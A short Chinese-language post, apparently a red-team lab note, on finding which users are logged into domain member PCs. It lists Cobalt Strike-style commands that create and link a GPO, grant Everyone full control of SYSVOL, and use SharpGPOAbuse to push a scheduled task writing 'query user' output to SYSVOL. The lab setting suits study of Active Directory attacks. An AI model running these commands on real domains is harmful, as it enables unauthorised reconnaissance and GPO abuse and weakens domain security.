Uploaded by jingshangchen

域内定位成员pc机的办法

advertisement
域内定位成员pc机的办法
来自星球讨论群组的问题"有什么域内定位成员pc机的好办法吗",其中有师傅提
出:
gpo下发 query user 写log到sysvol就好了
一开始没理解,sysvol为啥普通域用户也可以写入,直到师傅的一句 都是域管了,修
改一下文件夹权限,才让我恍然大悟...
创建组策略:
powershell Import-Module GroupPolicy;new-gpo -name
QueryDomainUser01
连接到域:
powershell Import-Module GroupPolicy;new-gplink -name
QueryDomainUser01 -Target "dc=vulntarget,dc=com"
之后修改一下sysvol的权限:
shell icacls c:\windows\sysvol\ /grant Everyone:(OI)(CI)(F) /T
下发:
execute-assembly /root/cs/sharp/SharpGPOAbuse.exe -AddComputerTask --TaskName "QueryDomainUser001" --Author
vulntarget\\administrator --Command "cmd.exe" --Arguments "cmd /c
query user > \\win2019.vulntarget.com\sysvol\%COMPUTERNAME%.txt"
--GPOName "QueryDomainUser01"
之后等待90分钟(我懒得等了,直接强制执行了)
gpupdate /force
最终结果
WIN2016 和 WIN2019RY 是我手动输入的 gpupdate /force ,中间回消息了来
着。
当然,路径可以在优化一下,我就懒得再整了
Download